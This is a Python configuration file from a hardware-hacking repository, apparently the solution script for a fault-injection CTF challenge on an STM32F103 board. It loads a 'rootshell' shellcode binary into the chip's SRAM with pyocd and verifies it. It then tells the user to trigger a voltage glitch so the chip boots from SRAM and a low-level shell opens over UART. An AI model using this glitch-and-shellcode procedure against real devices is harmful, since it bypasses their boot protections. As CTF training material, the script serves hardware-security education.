0xRoM / Hardware
Transfer to URL with SHA Find file
Newer
Older
Hardware / FaultInjection / examples / CuriousBolt / Level-1 / ConfigChall04.py
root on 3 May 2 KB Added Level 1 STM32F103 CTF Solutions
Raw Blame History 
  1. ######
  2. # config to complete Level 1, Challenge 4 using "glitch-o-bolt"
  3. ######
  4. # LEAVE THESE IMPORTS!
  5. ######
  6. import time
  7. import functions
  8.  
  9. from pyocd.core.helpers import ConnectHelper
  10. from pyocd.flash.file_programmer import FileProgrammer
  11.  
  12. ######
  13. # config values
  14. ######
  15.  
  16. SERIAL_PORT = '/dev/ttyUSB0'
  17. BAUD_RATE = 115200
  18.  
  19. LENGTH = 50
  20. REPEAT = 1
  21. DELAY = 1
  22.  
  23. ###
  24. # name, enabled, string to match
  25. ###
  26. conditions = [
  27.     ['Start', False, '', 'start_chall_04'],
  28.     ['Step1', False, '', 'step_1'],
  29.     ['Step2', False, '', 'step_2'],
  30. ]
  31.  
  32. ######
  33. # Custom functions for conditions to trigger
  34. ######
  35.  
  36. def start_chall_04():
  37.     functions.add_text(f"[Chall 4] enable uart switch then hold chall 4 button to load the challenge into memory.")
  38.     functions.add_text(f"[Chall 4] once loaded hold 'boot 1' button and press 'reset' button to put in bootloader mode") 
  39.     functions.add_text(f"[Chall 4] then press 'Step1'")
  40.  
  41. def step_1():
  42.     functions.set_uart_switch(False)
  43.  
  44.     functions.add_text(f"\n[Chall 4] uploading firmware to ram... please wait")
  45.  
  46.     # Connect to the target board
  47.     session = ConnectHelper.session_with_chosen_probe()
  48.     session.open()
  49.  
  50.     # Optionally halt the target
  51.     target = session.target
  52.     target.halt()
  53.  
  54.     # Load binary file to specified address (e.g., 0x20000000)
  55.     newFirmware = "/tmp/f103-analysis/h3/rootshell/shellcode-0xRoM.bin"
  56.     programmer = FileProgrammer(session)
  57.     programmer.program(newFirmware, base_address=0x20000000, file_format='bin')
  58.  
  59.     # Optionally resume execution
  60.     target.resume()
  61.     # Clean up
  62.     session.close()
  63.  
  64.     with open(newFirmware, "rb") as f:
  65.         original_data = f.read()
  66.  
  67.     # Connect to the target
  68.     session = ConnectHelper.session_with_chosen_probe()
  69.     session.open()
  70.  
  71.     target = session.target
  72.     target.halt()
  73.  
  74.     # Read back the memory from the target
  75.     read_data = target.read_memory_block8(0x20000000, len(original_data))
  76.  
  77.     # Compare
  78.     if bytes(read_data) == original_data:
  79.          functions.add_text(f"[+] Shellcode loaded successfully.")
  80.     else:
  81.          functions.add_text(f"[!] Mismatch detected. Shellcode may not have loaded correctly.")
  82.  
  83.     session.close()
  84.  
  85.     functions.change_baudrate(9600)
  86.     functions.add_text(f"[Chall 4] hold buttons 'boot0' and 'boot1' and press the 'glitch' button")
  87.     functions.add_text(f"[Chall 4] this single glitch will boot from SRAM")
  88.     functions.add_text(f"[Chall 4] enable UART to access 'Low-level Shell' (might need to press reset)")
  89.     functions.add_text(f"[Chall 4] then press 'Step2'")
  90.     
  91. def step_2():
  92.     functions.send_uart_message("p") 
  93.     time.sleep(1)
  94.     functions.change_baudrate(115200)
Buy Me A Coffee